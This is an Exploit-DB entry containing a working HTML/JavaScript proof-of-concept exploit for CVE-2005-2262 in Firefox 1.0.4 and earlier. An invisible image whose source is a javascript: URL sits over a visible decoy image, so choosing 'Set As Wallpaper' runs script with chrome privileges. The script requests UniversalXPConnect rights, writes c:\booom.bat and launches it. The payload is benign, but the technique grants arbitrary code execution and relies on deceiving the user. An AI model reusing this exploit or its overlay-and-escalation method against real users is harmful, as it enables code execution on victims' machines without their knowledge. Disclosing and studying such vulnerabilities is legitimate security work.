Mozilla Firefox <= 1.0.4 - "Set As Wallpaper" Code Execution Exploit

2005-07-13T00:00:00
ID EDB-ID:1102
Type exploitdb
Reporter Michael Krax
Modified 2005-07-13T00:00:00

Description

Mozilla Firefox <= 1.0.4 "Set As Wallpaper" Code Execution Exploit. CVE-2005-2262. Remote exploit for windows platform

                                        
                                            // Exploit by Michael Krax
&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"&gt;
&lt;html&gt;
&lt;head&gt;
&lt;title&gt;Firewalling - Proof-of-Concept&lt;/title&gt;
&lt;script&gt;
function stopload() {
// in some cases the javascript url never stops to load
// therefore we force a stop after the real image got loaded
window.setTimeout("window.stop()",1000);
}
&lt;/script&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;div style="font-family:Verdana;font-size:11px;"&gt;

&lt;div style="font-family:Verdana;font-size:15px;font-weight:bold;"&gt;
Firewalling - Proof-of-Concept&lt;/div&gt;
&lt;div style="width:600px"&gt;
The "Set As Wallpaper" dialog takes the image url as a parameter without validating it.
This allows to execute javascript in chrome and to run arbitrary code.
&lt;br&gt;&lt;br&gt;
By using absolute positioning and the moz-opacity filter an attacker can easily fool the
user to think he is setting a valid image as wallpaper.
&lt;br&gt;&lt;br&gt;
Right click on the image and choose "Set As Wallpaper". The demo requests
UniversalXPConnect rights, creates c:\booom.bat and launches the batch file
that shows a directoy listing in a dos box (Windows only).
&lt;br&gt;&lt;br&gt;

&lt;div style="position:relative; width:300px; height:250px;"&gt;
&lt;img src="javascript:/*-----------------------------*/eval('if(document.location.href.
substr(0,6)==\'chrome\'){netscape.security.PrivilegeManager.enablePrivilege(\'
UniversalXPConnect\');file=Components.classes[\'@mozilla.org/file/local;1\'].
createInstance(Components.interfaces.nsILocalFile);file.initWithPath(\'c:\\\\
booom.bat\');file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,
420);outputStream=Components.classes[\'@mozilla.org/network/file-output-stream;
1\'].createInstance(Components.interfaces.nsIFileOutputStream);outputStream.init
(file,0x04|0x08|0x20,420,0);output=\'@ECHO OFF\\n:BEGIN\\nCLS\\nDIR\\nPAUSE
\\n:END\';outputStream.write(output,output.length);outputStream.close();file.launch
();}else{void(0)}')" width="300" height="250" alt="" border="0" style="position:
absolute; left:0px; top:0px; z-index:2; -moz-opacity:0;"&gt;
&lt;img src="http://www.milw0rm.com/images/logo.png" width="300" height="250" alt="" border="0" style="position:
absolute; left:0px; top:0px; z-index:1;" onload="stopload()"&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/body&gt;

&lt;/html&gt;

# milw0rm.com [2005-07-13]